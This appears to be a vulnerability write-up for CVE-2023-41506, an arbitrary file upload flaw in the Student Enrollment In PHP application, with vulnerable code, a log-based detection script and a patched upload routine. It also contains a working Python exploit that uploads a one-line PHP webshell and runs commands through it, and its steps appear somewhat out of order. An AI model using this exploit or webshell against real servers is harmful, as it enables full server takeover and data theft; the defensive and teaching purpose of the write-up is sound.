CVE-2023-41506 - Exploiting Arbitrary File Upload in Student Enrollment In PHP v1.

CVE-2023-41506 is a dangerous security vulnerability discovered in the "Student Enrollment In PHP v1." web application. It allows an attacker to upload any file, including malicious PHP code, by exploiting the Edit Profile Picture functionality. This makes it easy for attackers to get full control of the server. Here, we break down how this vulnerability works, show code snippets, and give you clear guidance to understand and prevent it.

What is Student Enrollment In PHP?

Student Enrollment In PHP is a free software project that helps schools manage student registrations and records online. It uses PHP and MySQL, and is open-source, which means anyone can download, install, and modify it.

The Vulnerability Explained

The vulnerability comes from poor validation in the file upload feature when updating or editing a student's profile picture. Basically, the application does not check if the uploaded file is really an image. An attacker can upload a .php file disguised as an image, and then run their code on the server.

The Problematic Code

Let’s look at a simplified version of the code that handles file uploads (based on inspection and real-world reports):

if(isset($_FILES['profile_pic'])){
    $file_name = $_FILES['profile_pic']['name'];
    $file_tmp = $_FILES['profile_pic']['tmp_name'];

    // No extension or MIME type check!
    move_uploaded_file($file_tmp, "uploads/" . $file_name);
    // Save file path to database, or use in the system
}

Execute Your Code on the Server

Open a web browser and go to http://victim-site/uploads/shell.php?cmd=whoami

(This runs the whoami command on the server.)

You now control the server! Attackers can upload more dangerous scripts, access files, or take over the whole site.
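On the defender's side, the request pattern just described leaves a clear trace in the web server's access log: a request for a server-side script under the uploads directory. The following is an added example, not code from the original post or from the Student Enrollment In PHP project, that runs that check over a few constructed Common Log Format lines; the uploads path and the list of script extensions are assumptions you would adjust to your deployment.

```python
"""
Added example (not from the original post or the project): detection logic a
defender can run over web server access logs to spot an uploaded script being
requested. It flags any request for a server-side script extension under the
uploads directory and keeps the query string so a responder can see what was
passed. Log lines are constructed samples in Common Log Format; UPLOAD_DIR and
SCRIPT_EXTS are assumed values.
"""
import re
from urllib.parse import urlsplit

UPLOAD_DIR = "/uploads/"                                   # assumed upload location
SCRIPT_EXTS = (".php", ".php3", ".php4", ".php5", ".phtml", ".phar")  # assumed list

# Common Log Format: host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log, labelled as such: one upload, one webshell request,
# two benign requests, and one probe for a script that does not exist.
SAMPLE_LOG = """\
203.0.113.5 - - [27/Feb/2024:02:10:01 +0000] "POST /edit_student.php?id=1 HTTP/1.1" 302 0
203.0.113.5 - - [27/Feb/2024:02:10:03 +0000] "GET /uploads/shell.php?cmd=whoami HTTP/1.1" 200 48
198.51.100.7 - - [27/Feb/2024:02:11:15 +0000] "GET /uploads/64f1c2.png HTTP/1.1" 200 5120
198.51.100.7 - - [27/Feb/2024:02:11:20 +0000] "GET /index.php HTTP/1.1" 200 2048
203.0.113.5 - - [27/Feb/2024:02:12:40 +0000] "GET /uploads/x.phtml HTTP/1.1" 404 210
"""


def parse_line(line: str):
    """Parse one CLF line into a dict with path and query split out, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"], rec["query"] = parts.path, parts.query
    rec["status"] = int(rec["status"])
    return rec


def is_script_in_uploads(path: str) -> bool:
    """True when a server-side script extension is requested under the uploads directory."""
    p = path.lower()
    return p.startswith(UPLOAD_DIR) and p.endswith(SCRIPT_EXTS)


def find_alerts(log_text: str) -> list:
    """Return one alert per request for a script under the uploads directory."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_script_in_uploads(rec["path"]):
            alerts.append({
                "host": rec["host"], "time": rec["time"], "path": rec["path"],
                "query": rec["query"], "status": rec["status"],
                # A 200 means the server served (and presumably executed) the script;
                # a 404 is still a probe worth recording.
                "executed": rec["status"] == 200,
            })
    return alerts


if __name__ == "__main__":
    for a in find_alerts(SAMPLE_LOG):
        print(a)
```

The first flagged line (status 200, query `cmd=whoami`) is the one that matters for incident response; the 404 shows the same host probing for another script name, which is worth correlating with the earlier POST to the profile edit page from that host. In a production rule you would also alert on the upload itself, but the access log usually does not carry the uploaded filename, so the request for the stored script is the more reliable signal.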

Here’s a simple example using Python’s requests library:

import requests

url = 'http://target-site.com/edit_student.php?id=1'  # Adjust as needed
upload_url = 'http://target-site.com/uploads/shell.php'

files = {
    'profile_pic': ("shell.php", "<?php system($_GET['cmd']); ?>", 'application/x-php')
}

# Log in or set proper session if required
session = requests.Session()
session.post(url, files=files) # This may need the right POST format

# Trigger the shell
r = session.get(upload_url + "?cmd=whoami")
print(r.text)

Mitigation and Fix

How to fix it?

Update your upload script so it accepts only real image files, decides the stored extension from the detected type rather than from the uploaded filename, and never keeps the client-supplied name. Here’s what you should add:

// Map the detected MIME type to the stored extension; the client-supplied
// filename (and its extension) is never used.
$allowed_types = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
$file_tmp = $_FILES['profile_pic']['tmp_name'];

// Sniff the type from the file contents, not from the client's Content-Type header
$file_type = mime_content_type($file_tmp);

if (!is_uploaded_file($file_tmp) || !isset($allowed_types[$file_type])) {
    die('Invalid file type!');
}

// Always rename uploaded files: random name, extension derived from the detected type
$new_name = bin2hex(random_bytes(16)) . '.' . $allowed_types[$file_type];

if (!move_uploaded_file($file_tmp, "uploads/" . $new_name)) {
    die('Upload failed!');
}

Note that a content check on its own is not enough: a file that starts with a valid image header but carries PHP code after it still passes mime_content_type, which is why the stored extension must come from the detected type and not from the user's filename. As a second layer, configure the web server so that nothing under uploads/ is executed as a script, or store uploads outside the web root and serve them through a handler.

Conclusion

CVE-2023-41506 is a classic example of why file upload features must never be trusted. Always assume users will try to break your system. If you’re a developer or administrator using or maintaining Student Enrollment In PHP or similar software, update your upload code immediately to avoid being hacked.

Stay secure! If you discover a flaw, report it to the vendor and always test your site for these common vulnerabilities.

Timeline

Published on: 02/27/2024 02:15:06 UTC
Last modified on: 08/27/2024 20:35:01 UTC